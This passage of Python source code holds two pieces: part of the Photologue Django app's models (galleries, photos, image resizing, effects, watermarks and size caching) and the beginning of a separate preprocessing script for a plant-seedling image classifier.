('FLIP_TOP_BOTTOM', _('Flip top to bottom')),
('ROTATE_90', _('Rotate 90 degrees counter-clockwise')),
('ROTATE_270', _('Rotate 90 degrees clockwise')),
('ROTATE_180', _('Rotate 180 degrees')),
)
WATERMARK_STYLE_CHOICES = (
('tile', _('Tile')),
('scale', _('Scale')),
)
# Prepare a list of image filters
# (collect every named builtin PIL filter class for the help text below)
filter_names = []
for n in dir(ImageFilter):
    klass = getattr(ImageFilter, n)
    if isclass(klass) and issubclass(klass, ImageFilter.BuiltinFilter) and \
            hasattr(klass, 'name'):
        filter_names.append(klass.__name__)
# NOTE(review): the string is %-formatted *before* being passed to _() here,
# and PhotoEffect.filters wraps it in _() again -- confirm the double
# gettext call is intentional.
IMAGE_FILTERS_HELP_TEXT = _('Chain multiple filters using the following pattern "FILTER_ONE->FILTER_TWO->FILTER_THREE"'
                            '. Image filters will be applied in order. The following filters are available: %s.'
                            % (', '.join(filter_names)))
# lazily populated by init_size_method_map(); maps dynamic accessor names
# (e.g. "get_thumbnail_url") to their base method + size
size_method_map = {}
class TagField(models.CharField):
    """Tags have been removed from Photologue, but the migrations still refer to them so this
    Tagfield definition is left here.
    """

    def __init__(self, **kwargs):
        # historical defaults, overridable by the caller
        merged = dict({'max_length': 255, 'blank': True}, **kwargs)
        super().__init__(**merged)

    def get_internal_type(self):
        return 'CharField'
class Gallery(models.Model):
    """A site-scoped, ordered collection of Photo objects."""
    date_added = models.DateTimeField(_('date published'),
                                      default=now)
    title = models.CharField(_('title'),
                             max_length=250,
                             unique=True)
    slug = models.SlugField(_('title slug'),
                            unique=True,
                            max_length=250,
                            help_text=_('A "slug" is a unique URL-friendly title for an object.'))
    description = models.TextField(_('description'),
                                   blank=True)
    is_public = models.BooleanField(_('is public'),
                                    default=True,
                                    help_text=_('Public galleries will be displayed '
                                                'in the default views.'))
    photos = SortedManyToManyField('photologue.Photo',
                                   related_name='galleries',
                                   verbose_name=_('photos'),
                                   blank=True)
    sites = models.ManyToManyField(Site, verbose_name=_('sites'),
                                   blank=True)
    objects = GalleryQuerySet.as_manager()

    class Meta:
        ordering = ['-date_added']
        get_latest_by = 'date_added'
        verbose_name = _('gallery')
        verbose_name_plural = _('galleries')

    def __str__(self):
        return self.title

    def get_absolute_url(self):
        return reverse('photologue:pl-gallery', args=[self.slug])

    def latest(self, limit=LATEST_LIMIT, public=True):
        # Return up to `limit` photos; a falsy limit means "all of them".
        if not limit:
            limit = self.photo_count()
        if public:
            return self.public()[:limit]
        else:
            return self.photos.filter(sites__id=settings.SITE_ID)[:limit]

    def sample(self, count=None, public=True):
        """Return a sample of photos, ordered at random.
        If the 'count' is not specified, it will return a number of photos
        limited by the GALLERY_SAMPLE_SIZE setting.
        """
        if not count:
            count = SAMPLE_SIZE
        if count > self.photo_count():
            count = self.photo_count()
        if public:
            photo_set = self.public()
        else:
            photo_set = self.photos.filter(sites__id=settings.SITE_ID)
        # materialize the queryset; random.sample needs a concrete population
        return random.sample(set(photo_set), count)

    def photo_count(self, public=True):
        """Return a count of all the photos in this gallery."""
        if public:
            return self.public().count()
        else:
            return self.photos.filter(sites__id=settings.SITE_ID).count()
    photo_count.short_description = _('count')

    def public(self):
        """Return a queryset of all the public photos in this gallery."""
        return self.photos.is_public().filter(sites__id=settings.SITE_ID)

    def orphaned_photos(self):
        """
        Return all photos that belong to this gallery but don't share the
        gallery's site.
        """
        return self.photos.filter(is_public=True) \
                          .exclude(sites__id__in=self.sites.all())
class ImageModel(models.Model):
    """Abstract base for models wrapping an uploaded image.

    Provides EXIF access, cached resized renditions (one file per PhotoSize,
    stored under a sibling "cache" directory), dynamic ``get_<size>_url``-style
    accessors via ``__getattr__``, and cache maintenance on save/delete.
    """
    image = models.ImageField(_('image'),
                              max_length=IMAGE_FIELD_MAX_LENGTH,
                              upload_to=get_storage_path)
    date_taken = models.DateTimeField(_('date taken'),
                                      null=True,
                                      blank=True,
                                      help_text=_('Date image was taken; is obtained from the image EXIF data.'))
    view_count = models.PositiveIntegerField(_('view count'),
                                             default=0,
                                             editable=False)
    crop_from = models.CharField(_('crop from'),
                                 blank=True,
                                 max_length=10,
                                 default='center',
                                 choices=CROP_ANCHOR_CHOICES)
    effect = models.ForeignKey('photologue.PhotoEffect',
                               null=True,
                               blank=True,
                               related_name="%(class)s_related",
                               verbose_name=_('effect'),
                               on_delete=models.CASCADE)

    class Meta:
        abstract = True

    def EXIF(self, file=None):
        """Return the image's EXIF tags as a dict ({} on any failure).

        If *file* is given it is read directly; otherwise the stored image
        is opened (with details=False for speed).
        """
        try:
            if file:
                tags = exifread.process_file(file)
            else:
                with self.image.storage.open(self.image.name, 'rb') as file:
                    tags = exifread.process_file(file, details=False)
            return tags
        # BUGFIX: was a bare `except:`, which also swallowed SystemExit/
        # KeyboardInterrupt; narrowed to Exception, behavior otherwise kept.
        except Exception:
            return {}

    def admin_thumbnail(self):
        """HTML thumbnail link for the admin changelist."""
        func = getattr(self, 'get_admin_thumbnail_url', None)
        if func is None:
            return _('An "admin_thumbnail" photo size has not been defined.')
        else:
            # link to the object's page when available, else the raw image
            if hasattr(self, 'get_absolute_url'):
                return mark_safe('<a href="{}"><img src="{}"></a>'.format(self.get_absolute_url(), func()))
            else:
                return mark_safe('<a href="{}"><img src="{}"></a>'.format(self.image.url, func()))
    admin_thumbnail.short_description = _('Thumbnail')
    admin_thumbnail.allow_tags = True

    def cache_path(self):
        """Storage path of the directory holding the cached renditions."""
        return os.path.join(os.path.dirname(self.image.name), "cache")

    def cache_url(self):
        """Public URL of the cache directory."""
        return '/'.join([os.path.dirname(self.image.url), "cache"])

    def image_filename(self):
        """Base filename of the original image."""
        return os.path.basename(force_str(self.image.name))

    def _get_filename_for_size(self, size):
        # accepts either a PhotoSize (uses .name) or a plain size name
        size = getattr(size, 'name', size)
        base, ext = os.path.splitext(self.image_filename())
        return ''.join([base, '_', size, ext])

    def _get_SIZE_photosize(self, size):
        # backing implementation for the dynamic get_<size>_photosize()
        return PhotoSizeCache().sizes.get(size)

    def _get_SIZE_size(self, size):
        # backing implementation for get_<size>_size(); creates the
        # rendition on demand, returns None if it can't be opened
        photosize = PhotoSizeCache().sizes.get(size)
        if not self.size_exists(photosize):
            self.create_size(photosize)
        try:
            return Image.open(self.image.storage.open(
                self._get_SIZE_filename(size))).size
        # BUGFIX: bare `except:` narrowed to Exception (see EXIF()).
        except Exception:
            return None

    def _get_SIZE_url(self, size):
        # backing implementation for get_<size>_url(); creates the rendition
        # on demand and bumps the view counter for counted sizes
        photosize = PhotoSizeCache().sizes.get(size)
        if not self.size_exists(photosize):
            self.create_size(photosize)
        if photosize.increment_count:
            self.increment_count()
        return '/'.join([
            self.cache_url(),
            filepath_to_uri(self._get_filename_for_size(photosize.name))])

    def _get_SIZE_filename(self, size):
        # backing implementation for get_<size>_filename()
        photosize = PhotoSizeCache().sizes.get(size)
        return smart_str(os.path.join(self.cache_path(),
                                      self._get_filename_for_size(photosize.name)))

    def increment_count(self):
        """Bump view_count and persist it (bypasses subclass save() logic)."""
        self.view_count += 1
        models.Model.save(self)

    def __getattr__(self, name):
        # resolve dynamic per-size accessors (get_<size>_url etc.) from the
        # lazily built size_method_map, caching the bound partial on self
        global size_method_map
        if not size_method_map:
            init_size_method_map()
        di = size_method_map.get(name, None)
        if di is not None:
            result = partial(getattr(self, di['base_name']), di['size'])
            setattr(self, name, result)
            return result
        else:
            raise AttributeError

    def size_exists(self, photosize):
        """Return True if the cached rendition for *photosize* already exists."""
        func = getattr(self, "get_%s_filename" % photosize.name, None)
        if func is not None:
            if self.image.storage.exists(func()):
                return True
        return False

    def resize_image(self, im, photosize):
        """Return *im* resized (and optionally cropped) to *photosize*."""
        cur_width, cur_height = im.size
        new_width, new_height = photosize.size
        if photosize.crop:
            # scale so the image covers the target box, then crop the
            # overflow according to crop_from
            ratio = max(float(new_width) / cur_width, float(new_height) / cur_height)
            x = (cur_width * ratio)
            y = (cur_height * ratio)
            xd = abs(new_width - x)
            yd = abs(new_height - y)
            x_diff = int(xd / 2)
            y_diff = int(yd / 2)
            if self.crop_from == 'top':
                box = (int(x_diff), 0, int(x_diff + new_width), new_height)
            elif self.crop_from == 'left':
                box = (0, int(y_diff), new_width, int(y_diff + new_height))
            elif self.crop_from == 'bottom':
                # y - yd = new_height
                box = (int(x_diff), int(yd), int(x_diff + new_width), int(y))
            elif self.crop_from == 'right':
                # x - xd = new_width
                box = (int(xd), int(y_diff), int(x), int(y_diff + new_height))
            else:
                box = (int(x_diff), int(y_diff), int(x_diff + new_width), int(y_diff + new_height))
            im = im.resize((int(x), int(y)), Image.ANTIALIAS).crop(box)
        else:
            # scale to fit inside the box; a zero dimension means "free"
            if not new_width == 0 and not new_height == 0:
                ratio = min(float(new_width) / cur_width,
                            float(new_height) / cur_height)
            else:
                if new_width == 0:
                    ratio = float(new_height) / cur_height
                else:
                    ratio = float(new_width) / cur_width
            new_dimensions = (int(round(cur_width * ratio)),
                              int(round(cur_height * ratio)))
            if new_dimensions[0] > cur_width or \
                    new_dimensions[1] > cur_height:
                # never upscale unless the photosize explicitly allows it
                if not photosize.upscale:
                    return im
            im = im.resize(new_dimensions, Image.ANTIALIAS)
        return im

    def create_size(self, photosize, recreate=False):
        """Render and store the cached file for *photosize*.

        No-op if it already exists (unless *recreate*); silently returns if
        the source image cannot be opened.
        """
        if self.size_exists(photosize) and not recreate:
            return
        try:
            im = Image.open(self.image.storage.open(self.image.name))
        except OSError:
            return
        # Save the original format
        im_format = im.format
        # Apply effect if found
        if self.effect is not None:
            im = self.effect.pre_process(im)
        elif photosize.effect is not None:
            im = photosize.effect.pre_process(im)
        # Rotate if found & necessary
        if 'Image Orientation' in self.EXIF() and \
                self.EXIF().get('Image Orientation').values[0] in IMAGE_EXIF_ORIENTATION_MAP:
            im = im.transpose(
                IMAGE_EXIF_ORIENTATION_MAP[self.EXIF().get('Image Orientation').values[0]])
        # Resize/crop image
        if (im.size != photosize.size and photosize.size != (0, 0)) or recreate:
            im = self.resize_image(im, photosize)
        # Apply watermark if found
        if photosize.watermark is not None:
            im = photosize.watermark.post_process(im)
        # Apply effect if found
        if self.effect is not None:
            im = self.effect.post_process(im)
        elif photosize.effect is not None:
            im = photosize.effect.post_process(im)
        # Save file
        im_filename = getattr(self, "get_%s_filename" % photosize.name)()
        try:
            buffer = BytesIO()
            if im_format != 'JPEG':
                im.save(buffer, im_format)
            else:
                # Issue #182 - test fix from https://github.com/bashu/django-watermark/issues/31
                if im.mode.endswith('A'):
                    im = im.convert(im.mode[:-1])
                im.save(buffer, 'JPEG', quality=int(photosize.quality),
                        optimize=True)
            buffer_contents = ContentFile(buffer.getvalue())
            self.image.storage.save(im_filename, buffer_contents)
        except OSError as e:
            # don't leave a partial rendition behind
            if self.image.storage.exists(im_filename):
                self.image.storage.delete(im_filename)
            raise e

    def remove_size(self, photosize, remove_dirs=True):
        """Delete the cached file for *photosize* if present.

        NOTE(review): remove_dirs is currently unused -- kept for
        backward-compatible signatures.
        """
        if not self.size_exists(photosize):
            return
        filename = getattr(self, "get_%s_filename" % photosize.name)()
        if self.image.storage.exists(filename):
            self.image.storage.delete(filename)

    def clear_cache(self):
        """Delete every cached rendition of this image."""
        cache = PhotoSizeCache()
        for photosize in cache.sizes.values():
            self.remove_size(photosize, False)

    def pre_cache(self, recreate=False):
        """Eagerly render every photosize flagged with pre_cache."""
        cache = PhotoSizeCache()
        if recreate:
            self.clear_cache()
        for photosize in cache.sizes.values():
            if photosize.pre_cache:
                self.create_size(photosize, recreate)

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # remember the image as loaded, so save() can detect replacement
        self._old_image = self.image

    def save(self, *args, **kwargs):
        """Persist the model, clearing stale caches and reading EXIF date.

        Accepts an extra keyword ``recreate`` to force re-rendering of all
        cached sizes.
        """
        recreate = kwargs.pop('recreate', False)
        image_has_changed = False
        if self._get_pk_val() and (self._old_image != self.image):
            image_has_changed = True
            # If we have changed the image, we need to clear from the cache all instances of the old
            # image; clear_cache() works on the current (new) image, and in turn calls several other methods.
            # Changing them all to act on the old image was a lot of changes, so instead we temporarily swap old
            # and new images.
            new_image = self.image
            self.image = self._old_image
            self.clear_cache()
            self.image = new_image  # Back to the new image.
            self._old_image.storage.delete(self._old_image.name)  # Delete (old) base image.
        if self.date_taken is None or image_has_changed:
            # Attempt to get the date the photo was taken from the EXIF data.
            try:
                exif_date = self.EXIF(self.image.file).get('EXIF DateTimeOriginal', None)
                if exif_date is not None:
                    d, t = exif_date.values.split()
                    year, month, day = d.split(':')
                    hour, minute, second = t.split(':')
                    self.date_taken = datetime(int(year), int(month), int(day),
                                               int(hour), int(minute), int(second))
            # BUGFIX: bare `except:` narrowed to Exception (see EXIF()).
            except Exception:
                logger.error('Failed to read EXIF DateTimeOriginal', exc_info=True)
        super().save(*args, **kwargs)
        self.pre_cache(recreate)

    def delete(self):
        assert self._get_pk_val() is not None, \
            "%s object can't be deleted because its %s attribute is set to None." % \
            (self._meta.object_name, self._meta.pk.attname)
        self.clear_cache()
        # Files associated to a FileField have to be manually deleted:
        # https://docs.djangoproject.com/en/dev/releases/1.3/#deleting-a-model-doesn-t-delete-associated-files
        # http://haineault.com/blog/147/
        # The data loss scenarios mentioned in the docs hopefully do not apply
        # to Photologue!
        super().delete()
        self.image.storage.delete(self.image.name)
class Photo(ImageModel):
    """A single public-or-private photo, belonging to zero or more galleries."""
    title = models.CharField(_('title'),
                             max_length=250,
                             unique=True)
    slug = models.SlugField(_('slug'),
                            unique=True,
                            max_length=250,
                            help_text=_('A "slug" is a unique URL-friendly title for an object.'))
    caption = models.TextField(_('caption'),
                               blank=True)
    date_added = models.DateTimeField(_('date added'),
                                      default=now)
    is_public = models.BooleanField(_('is public'),
                                    default=True,
                                    help_text=_('Public photographs will be displayed in the default views.'))
    sites = models.ManyToManyField(Site, verbose_name=_('sites'),
                                   blank=True)
    objects = PhotoQuerySet.as_manager()

    class Meta:
        ordering = ['-date_added']
        get_latest_by = 'date_added'
        verbose_name = _("photo")
        verbose_name_plural = _("photos")

    def __str__(self):
        return self.title

    def save(self, *args, **kwargs):
        # If crop_from or effect property has been changed on existing image,
        # update kwargs to force image recreation in parent class
        current = Photo.objects.get(pk=self.pk) if self.pk else None
        if current and (current.crop_from != self.crop_from or current.effect != self.effect):
            kwargs.update(recreate=True)
        # NOTE(review): a freshly constructed Photo has slug == '' (not None),
        # so this auto-slugify only fires when slug is explicitly None --
        # confirm that is the intended behavior.
        if self.slug is None:
            self.slug = slugify(self.title)
        super().save(*args, **kwargs)

    def get_absolute_url(self):
        return reverse('photologue:pl-photo', args=[self.slug])

    def public_galleries(self):
        """Return the public galleries to which this photo belongs."""
        return self.galleries.filter(is_public=True)

    def get_previous_in_gallery(self, gallery):
        """Find the neighbour of this photo in the supplied gallery.
        We assume that the gallery and all its photos are on the same site.
        """
        if not self.is_public:
            raise ValueError('Cannot determine neighbours of a non-public photo.')
        photos = gallery.photos.is_public()
        if self not in photos:
            raise ValueError('Photo does not belong to gallery.')
        # walk the ordered queryset, remembering the previous element;
        # returns None when self is the first photo
        previous = None
        for photo in photos:
            if photo == self:
                return previous
            previous = photo

    def get_next_in_gallery(self, gallery):
        """Find the neighbour of this photo in the supplied gallery.
        We assume that the gallery and all its photos are on the same site.
        """
        if not self.is_public:
            raise ValueError('Cannot determine neighbours of a non-public photo.')
        photos = gallery.photos.is_public()
        if self not in photos:
            raise ValueError('Photo does not belong to gallery.')
        # return the element that follows self; None when self is last
        matched = False
        for photo in photos:
            if matched:
                return photo
            if photo == self:
                matched = True
        return None
class BaseEffect(models.Model):
    """Abstract base for image effects (PhotoEffect, watermarks, ...).

    Provides naming, a stored sample image regenerated on every save, and the
    pre/post processing hooks subclasses override.
    """
    name = models.CharField(_('name'),
                            max_length=30,
                            unique=True)
    description = models.TextField(_('description'),
                                   blank=True)

    class Meta:
        abstract = True

    def sample_dir(self):
        """Storage directory holding the generated sample images."""
        return os.path.join(PHOTOLOGUE_DIR, 'samples')

    def sample_url(self):
        """Public URL of this effect's sample image."""
        return settings.MEDIA_URL + '/'.join([PHOTOLOGUE_DIR, 'samples',
                                              '{} {}.jpg'.format(self.name.lower(), 'sample')])

    def sample_filename(self):
        """Storage filename of this effect's sample image."""
        return os.path.join(self.sample_dir(), '{} {}.jpg'.format(self.name.lower(), 'sample'))

    def create_sample(self):
        """Render SAMPLE_IMAGE_PATH through this effect and store the result."""
        try:
            im = Image.open(SAMPLE_IMAGE_PATH)
        except OSError:
            raise OSError(
                'Photologue was unable to open the sample image: %s.' % SAMPLE_IMAGE_PATH)
        im = self.process(im)
        buffer = BytesIO()
        # Issue #182 - test fix from https://github.com/bashu/django-watermark/issues/31
        if im.mode.endswith('A'):
            im = im.convert(im.mode[:-1])
        im.save(buffer, 'JPEG', quality=90, optimize=True)
        buffer_contents = ContentFile(buffer.getvalue())
        default_storage.save(self.sample_filename(), buffer_contents)

    def admin_sample(self):
        """HTML <img> tag for the admin changelist."""
        return '<img src="%s">' % self.sample_url()
    admin_sample.short_description = 'Sample'
    admin_sample.allow_tags = True

    def pre_process(self, im):
        """Hook applied before resizing; subclasses override."""
        return im

    def post_process(self, im):
        """Hook applied after resizing; subclasses override."""
        return im

    def process(self, im):
        """Run both hooks in order and return the processed image."""
        im = self.pre_process(im)
        im = self.post_process(im)
        return im

    def __str__(self):
        return self.name

    def save(self, *args, **kwargs):
        # best-effort removal of the stale sample before regenerating it
        # BUGFIX: was a bare `except:` which also swallowed SystemExit/
        # KeyboardInterrupt; narrowed to Exception, still best-effort.
        try:
            default_storage.delete(self.sample_filename())
        except Exception:
            pass
        models.Model.save(self, *args, **kwargs)
        self.create_sample()
        # any photosize using this effect must be re-rendered
        for size in self.photo_sizes.all():
            size.clear_cache()
        # try to clear all related subclasses of ImageModel
        for prop in [prop for prop in dir(self) if prop[-8:] == '_related']:
            for obj in getattr(self, prop).all():
                obj.clear_cache()
                obj.pre_cache()

    def delete(self):
        # best-effort removal of the sample image (see save())
        try:
            default_storage.delete(self.sample_filename())
        except Exception:
            pass
        models.Model.delete(self)
class PhotoEffect(BaseEffect):
    """ A pre-defined effect to apply to photos """
    # Name of a PIL ``Image`` transpose constant (e.g. FLIP_LEFT_RIGHT);
    # blank means no rotation/flip.
    transpose_method = models.CharField(_('rotate or flip'),
                                        max_length=15,
                                        blank=True,
                                        choices=IMAGE_TRANSPOSE_CHOICES)
    # Enhancement factors below all use 1.0 as "leave image unchanged".
    color = models.FloatField(_('color'),
                              default=1.0,
                              help_text=_('A factor of 0.0 gives a black and white image, a factor of 1.0 gives the '
                                          'original image.'))
    brightness = models.FloatField(_('brightness'),
                                   default=1.0,
                                   help_text=_('A factor of 0.0 gives a black image, a factor of 1.0 gives the '
                                               'original image.'))
    contrast = models.FloatField(_('contrast'),
                                 default=1.0,
                                 help_text=_('A factor of 0.0 gives a solid grey image, a factor of 1.0 gives the '
                                             'original image.'))
    sharpness = models.FloatField(_('sharpness'),
                                  default=1.0,
                                  help_text=_('A factor of 0.0 gives a blurred image, a factor of 1.0 gives the '
                                              'original image.'))
    # '->'-separated chain of PIL ImageFilter names, applied in order.
    filters = models.CharField(_('filters'),
                               max_length=200,
                               blank=True,
                               help_text=_(IMAGE_FILTERS_HELP_TEXT))
    reflection_size = models.FloatField(_('size'),
                                        default=0,
                                        help_text=_('The height of the reflection as a percentage of the orignal '
                                                    'image. A factor of 0.0 adds no reflection, a factor of 1.0 adds a'
                                                    ' reflection equal to the height of the orignal image.'))
    reflection_strength = models.FloatField(_('strength'),
                                            default=0.6,
                                            help_text=_('The initial opacity of the reflection gradient.'))
    background_color = models.CharField(_('color'),
                                        max_length=7,
                                        default="#FFFFFF",
                                        help_text=_('The background color of the reflection gradient. Set this to '
                                                    'match the background color of your page.'))

    class Meta:
        verbose_name = _("photo effect")
        verbose_name_plural = _("photo effects")

    def pre_process(self, im):
        """Apply transpose, color/brightness/contrast/sharpness
        enhancements and the configured PIL filters to ``im``."""
        if self.transpose_method != '':
            # Resolve the stored name to the PIL constant of the same name.
            method = getattr(Image, self.transpose_method)
            im = im.transpose(method)
        if im.mode != 'RGB' and im.mode != 'RGBA':
            # The ImageEnhance operations below require an RGB(A) image.
            return im
        for name in ['Color', 'Brightness', 'Contrast', 'Sharpness']:
            # Model field names are the lowercase of the enhancer names.
            factor = getattr(self, name.lower())
            if factor != 1.0:
                im = getattr(ImageEnhance, name)(im).enhance(factor)
        for name in self.filters.split('->'):
            # Unknown filter names are silently skipped.
            image_filter = getattr(ImageFilter, name.upper(), None)
            if image_filter is not None:
                try:
                    im = im.filter(image_filter)
                except ValueError:
                    # Some filters reject certain image modes; ignore them.
                    pass
        return im

    def post_process(self, im):
        """Optionally append a reflection gradient below the image."""
        if self.reflection_size != 0.0:
            im = add_reflection(im, bgcolor=self.background_color,
                                amount=self.reflection_size, opacity=self.reflection_strength)
        return im
class Watermark(BaseEffect):
    """An image overlay applied to photos (scaled/tiled per ``style``)."""
    image = models.ImageField(_('image'),
                              upload_to=PHOTOLOGUE_DIR + "/watermarks")
    style = models.CharField(_('style'),
                             max_length=5,
                             choices=WATERMARK_STYLE_CHOICES,
                             default='scale')
    opacity = models.FloatField(_('opacity'),
                                default=1,
                                help_text=_("The opacity of the overlay."))

    class Meta:
        verbose_name = _('watermark')
        verbose_name_plural = _('watermarks')

    def delete(self):
        assert self._get_pk_val() is not None, "%s object can't be deleted because its %s attribute is set to None." \
                                               % (self._meta.object_name, self._meta.pk.attname)
        super().delete()
        # Remove the watermark file itself after the DB row is gone.
        self.image.storage.delete(self.image.name)

    def post_process(self, im):
        """Composite the watermark image onto ``im``."""
        mark = Image.open(self.image.storage.open(self.image.name))
        return apply_watermark(im, mark, self.style, self.opacity)
class PhotoSize(models.Model):
    """About the Photosize name: it's used to create get_PHOTOSIZE_url() methods,
    so the name has to follow the same restrictions as any Python method name,
    e.g. no spaces or non-ascii characters."""
    name = models.CharField(_('name'),
                            max_length=40,
                            unique=True,
                            help_text=_(
                                'Photo size name should contain only letters, numbers and underscores. Examples: '
                                '"thumbnail", "display", "small", "main_page_widget".'),
                            validators=[RegexValidator(regex='^[a-z0-9_]+$',
                                                       message='Use only plain lowercase letters (ASCII), numbers and '
                                                               'underscores.'
                                                       )]
                            )
    # A width or height of 0 means "scale to the other dimension".
    width = models.PositiveIntegerField(_('width'),
                                        default=0,
                                        help_text=_(
                                            'If width is set to "0" the image will be scaled to the supplied height.'))
    height = models.PositiveIntegerField(_('height'),
                                         default=0,
                                         help_text=_(
                                             'If height is set to "0" the image will be scaled to the supplied width'))
    quality = models.PositiveIntegerField(_('quality'),
                                          choices=JPEG_QUALITY_CHOICES,
                                          default=70,
                                          help_text=_('JPEG image quality.'))
    upscale = models.BooleanField(_('upscale images?'),
                                  default=False,
                                  help_text=_('If selected the image will be scaled up if necessary to fit the '
                                              'supplied dimensions. Cropped sizes will be upscaled regardless of this '
                                              'setting.')
                                  )
    crop = models.BooleanField(_('crop to fit?'),
                               default=False,
                               help_text=_('If selected the image will be scaled and cropped to fit the supplied '
                                           'dimensions.'))
    pre_cache = models.BooleanField(_('pre-cache?'),
                                    default=False,
                                    help_text=_('If selected this photo size will be pre-cached as photos are added.'))
    increment_count = models.BooleanField(_('increment view count?'),
                                          default=False,
                                          help_text=_('If selected the image\'s "view_count" will be incremented when '
                                                      'this photo size is displayed.'))
    effect = models.ForeignKey('photologue.PhotoEffect',
                               null=True,
                               blank=True,
                               related_name='photo_sizes',
                               verbose_name=_('photo effect'),
                               on_delete=models.CASCADE)
    watermark = models.ForeignKey('photologue.Watermark',
                                  null=True,
                                  blank=True,
                                  related_name='photo_sizes',
                                  verbose_name=_('watermark image'),
                                  on_delete=models.CASCADE)

    class Meta:
        ordering = ['width', 'height']
        verbose_name = _('photo size')
        verbose_name_plural = _('photo sizes')

    def __str__(self):
        return self.name

    def clear_cache(self):
        """Delete (and optionally regenerate) this size's cached images
        for every ImageModel subclass instance."""
        for cls in ImageModel.__subclasses__():
            for obj in cls.objects.all():
                obj.remove_size(self)
                if self.pre_cache:
                    # Rebuild immediately so pre-cached sizes stay warm.
                    obj.create_size(self)
        PhotoSizeCache().reset()

    def clean(self):
        # Cropping needs a target box, so both dimensions must be non-zero.
        if self.crop is True:
            if self.width == 0 or self.height == 0:
                raise ValidationError(
                    _("Can only crop photos if both width and height dimensions are set."))

    def save(self, *args, **kwargs):
        super().save(*args, **kwargs)
        # Invalidate cached sizes so the new settings take effect.
        PhotoSizeCache().reset()
        self.clear_cache()

    def delete(self):
        assert self._get_pk_val() is not None, "%s object can't be deleted because its %s attribute is set to None." \
                                               % (self._meta.object_name, self._meta.pk.attname)
        self.clear_cache()
        super().delete()

    def _get_size(self):
        return (self.width, self.height)

    def _set_size(self, value):
        self.width, self.height = value
    # Convenience (width, height) tuple accessor.
    size = property(_get_size, _set_size)
class PhotoSizeCache:
    """Borg-style cache of PhotoSize rows keyed by name: every instance
    shares the same state, so the database is queried at most once."""
    __state = {"sizes": {}}

    def __init__(self):
        self.__dict__ = self.__state
        # Populate lazily on first use (truthiness check instead of the
        # non-idiomatic `if not len(self.sizes)`).
        if not self.sizes:
            for size in PhotoSize.objects.all():
                self.sizes[size.name] = size

    def reset(self):
        """Clear the cached sizes and the dynamic accessor-method map."""
        global size_method_map
        size_method_map = {}
        self.sizes = {}
def init_size_method_map():
    """Populate the module-level ``size_method_map`` with one entry per
    cached PhotoSize for each of the four dynamic accessors.

    Keys look like ``get_<size>_url`` and map to the generic handler name
    (``_get_SIZE_url``) plus the concrete size name.
    """
    global size_method_map
    # The four near-identical assignments of the original, as a loop.
    for size in PhotoSizeCache().sizes:
        for accessor in ('size', 'photosize', 'url', 'filename'):
            size_method_map['get_%s_%s' % (size, accessor)] = \
                {'base_name': '_get_SIZE_%s' % accessor, 'size': size}
def add_default_site(instance, created, **kwargs):
    """
    Called via Django's signals when an instance is created.
    In case PHOTOLOGUE_MULTISITE is False, the current site (i.e.
    ``settings.SITE_ID``) will always be added to the site relations if none are
    present.
    """
    multisite = getattr(settings, 'PHOTOLOGUE_MULTISITE', False)
    # Only act on freshly created, single-site instances with no sites yet;
    # `and` short-circuits, so sites.exists() is only queried when needed.
    if created and not multisite and not instance.sites.exists():
        instance.sites.add(Site.objects.get_current())
# Attach the current site to newly created galleries/photos when
# PHOTOLOGUE_MULTISITE is disabled (see add_default_site above).
post_save.connect(add_default_site, sender=Gallery)
post_save.connect(add_default_site, sender=Photo)
|
<reponame>plantclassification/seedlings_classification
import numpy as np
import glob
import cv2
import os
import matplotlib.pyplot as plt
import logging
import torch
from torchvision import transforms
# Input ( ,256,256,4) Output( ,12)
# Mapping from seedling species name to integer class label (12 classes).
CLASS = {
    'Black-grass': 0,
    'Charlock': 1,
    'Cleavers': 2,
    'Common Chickweed': 3,
    'Common wheat': 4,
    'Fat Hen': 5,
    'Loose Silky-bent': 6,
    'Maize': 7,
    'Scentless Mayweed': 8,
    'Shepherds Purse': 9,
    'Small-flowered Cranesbill': 10,
    'Sugar beet': 11
}
# Inverse mapping (label -> name), derived from CLASS so the two tables
# can never drift apart (the original maintained both by hand).
INV_CLASS = {label: name for name, label in CLASS.items()}
class Preprocessing():
    """Load the seedling image datasets from disk and convert them into
    model-ready arrays/tensors, optionally adding a segmented/sharpened
    grayscale channel as a 4th channel."""

    def __init__(self):
        # Raw strings avoid the invalid '\d' escape sequence of the
        # original literals; the resulting (Windows-style) path values
        # are unchanged.
        self.train_folder = r'..\data\train\train'
        self.test_folder = r'..\data\test\test'
        # Training data: images plus class-folder labels.
        self.data_dict = {
            "image": [],
            "label": []
        }
        # Test data: images, (unused) labels, and file-name ids.
        self.test_dict = {
            "image": [],
            "label": [],
            'id': []
        }

    @staticmethod
    def create_mask_for_plant(image):
        """Return a binary mask of the green plant pixels in a BGR image."""
        image_hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
        # Hue window centred on green (60) wide enough to cover seedlings.
        sensitivity = 35
        lower_hsv = np.array([60 - sensitivity, 100, 50])
        upper_hsv = np.array([60 + sensitivity, 255, 255])
        mask = cv2.inRange(image_hsv, lower_hsv, upper_hsv)
        # Morphological closing fills small holes in the mask.
        kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11, 11))
        mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)
        return mask

    def segment_plant(self, image):
        """Black out everything but the plant in ``image``."""
        mask = self.create_mask_for_plant(image)
        output = cv2.bitwise_and(image, image, mask=mask)
        return output

    @staticmethod
    def sharpen_image(image):
        """Sharpen ``image`` via unsharp masking (blend with a blurred copy)."""
        image_blurred = cv2.GaussianBlur(image, (0, 0), 3)
        image_sharp = cv2.addWeighted(image, 1.5, image_blurred, -0.5, 0)
        return image_sharp

    def _stacked_input(self, image, size=224):
        """Resize ``image`` and append a segmented/sharpened grayscale
        channel, giving a (size, size, 4) array. Extracted from the
        duplicated pipeline in read_image/read_data_mini/test_data_read/
        read_image_single."""
        image = cv2.resize(image, (size, size))
        seg = self.segment_plant(image)
        seg = self.sharpen_image(seg)
        seg = cv2.cvtColor(seg, cv2.COLOR_RGB2GRAY)
        seg = np.reshape(seg, (size, size, 1))
        return np.concatenate((np.array(image), np.array(seg)), axis=2)

    def read_image(self):
        """Read the full training set as channel-first (N, 4, 224, 224)
        arrays with integer class labels."""
        for class_folder in os.listdir(self.train_folder):
            class_path = os.path.join(self.train_folder, class_folder)
            for image_path in glob.glob(os.path.join(class_path, '*.png')):
                image = cv2.imread(image_path, cv2.IMREAD_COLOR)
                self.data_dict['image'].append(self._stacked_input(image))
                self.data_dict['label'].append(class_folder)
